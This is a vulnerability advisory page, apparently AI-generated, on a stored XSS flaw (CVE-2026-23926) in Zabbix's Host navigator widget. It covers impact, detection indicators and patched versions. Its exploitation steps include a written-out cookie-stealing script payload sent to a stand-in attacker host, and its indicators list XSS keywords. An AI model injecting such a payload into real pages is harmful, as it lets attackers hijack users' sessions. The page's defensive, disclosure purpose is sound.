CVE-2026-23926
Zabbix Server vulnerability analysis and mitigation

Overview

CVE-2026-23926 is a stored cross-site scripting (XSS) vulnerability in Zabbix's Host navigator widget that allows an authenticated non-super administrator to inject arbitrary JavaScript into maintenance period definitions. The injected payload executes in the browser of any user who opens the tooltip for that maintenance period. Affected versions include Zabbix 7.0.0–7.0.23 and 7.4.0–7.4.7. The vulnerability was disclosed on May 6, 2026, and carries a CVSS v4.0 base score of 7.3 (High) (Zabbix Advisory, GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. An authenticated non-super administrator crafts a maintenance period containing a malicious JavaScript payload in a field that is not properly sanitized before being rendered in the Host navigator widget's tooltip. When any other user hovers over or opens the tooltip for that maintenance period, the payload executes in their browser context, potentially with their session privileges. Exploitation requires the attacker to have non-super administrator credentials and the victim to interact with the Host navigator widget (Zabbix Advisory, GitHub Advisory).

Impact

Successful exploitation allows the injected JavaScript to execute in the browser of any user — including super administrators — who views the affected maintenance period tooltip, enabling unauthorized actions on behalf of the victim. Depending on the victim's privilege level, an attacker could escalate privileges, exfiltrate session tokens or sensitive data, perform administrative actions, or pivot to further compromise the Zabbix environment. Confidentiality, integrity, and availability of the vulnerable system are all rated High under CVSS v4.0 (Zabbix Advisory, GitHub Advisory).

Exploitation steps

  1. Gain non-super administrator access: Obtain credentials for a Zabbix non-super administrator account on a vulnerable instance (versions 7.0.0–7.0.23 or 7.4.0–7.4.7).
  2. Create a malicious maintenance period: Navigate to the Zabbix frontend and create or edit a maintenance period, injecting a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent XSS vector) into a field rendered unsanitized in the tooltip.
  3. Associate the maintenance period with monitored hosts: Ensure the malicious maintenance period is linked to hosts visible in the Host navigator widget so it appears in the dashboard.
  4. Wait for victim interaction: When a target user (e.g., a super administrator) opens the Zabbix dashboard and hovers over or clicks the tooltip for the affected maintenance period in the Host navigator widget, the payload executes in their browser.
  5. Harvest results or perform actions: The executed script can steal session cookies, perform API calls with the victim's privileges, exfiltrate data, or perform administrative actions within Zabbix on behalf of the victim (Zabbix Advisory, GitHub Advisory).

Indicators of compromise

  • Logs: Zabbix audit logs showing a non-super administrator creating or modifying maintenance periods with unusual or encoded content in name/description fields; unexpected administrative actions performed by high-privilege accounts shortly after viewing the Host navigator widget.
  • Network: Outbound HTTP/S requests from Zabbix frontend users' browsers to unknown external domains (potential cookie/session exfiltration endpoints) originating from Zabbix dashboard pages.
  • Application: Maintenance period definitions in the Zabbix database containing HTML tags, JavaScript keywords (<script>, onerror, onmouseover, javascript:), or encoded variants (e.g., %3Cscript%3E) in name or description fields.
  • User Behavior: Unexplained privilege escalation events or configuration changes in Zabbix attributed to high-privilege accounts that did not initiate those actions.

Mitigation and workarounds

Zabbix has released patched versions 7.0.24 (fixing 7.0.0–7.0.23) and 7.4.8 (fixing 7.4.0–7.4.7); upgrading to these versions is the recommended remediation (Zabbix Advisory). As an immediate workaround, the Host navigator widget can be disabled via Administration → General → Modules to prevent the vulnerable tooltip from being rendered. Additionally, organizations should restrict non-super administrator privileges to create or modify maintenance periods where not operationally required, and monitor for suspicious maintenance period configurations containing embedded scripts.

Community reactions

The vulnerability was acknowledged by Zabbix and credited to researcher Daniel Santos (@bananabr) via the HackerOne bug bounty platform (Zabbix Advisory). It was included in threat landscape digests for Week 19 of 2026 by security intelligence aggregators, indicating moderate community awareness. No significant vendor statements beyond the official advisory or notable researcher commentary beyond the discoverer's credit have been identified.

Additional resources


SourceThis report was generated using AI

Related Zabbix Server vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-23928HIGH7.3
  • Zabbix Server logoZabbix Server
  • cpe:2.3:a:zabbix:zabbix
NoNoMay 06, 2026
CVE-2026-23926HIGH7.3
  • Zabbix Server logoZabbix Server
  • cpe:2.3:a:zabbix:zabbix
NoNoMay 06, 2026
CVE-2026-23923MEDIUM6.9
  • Zabbix Server logoZabbix Server
  • cpe:2.3:a:zabbix:zabbix
NoNoMar 24, 2026
CVE-2026-23924MEDIUM6.1
  • Zabbix Server logoZabbix Server
  • zabbix
NoNoMar 24, 2026
CVE-2026-23927MEDIUM5.1
  • Zabbix Server logoZabbix Server
  • zabbix
NoNoMay 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management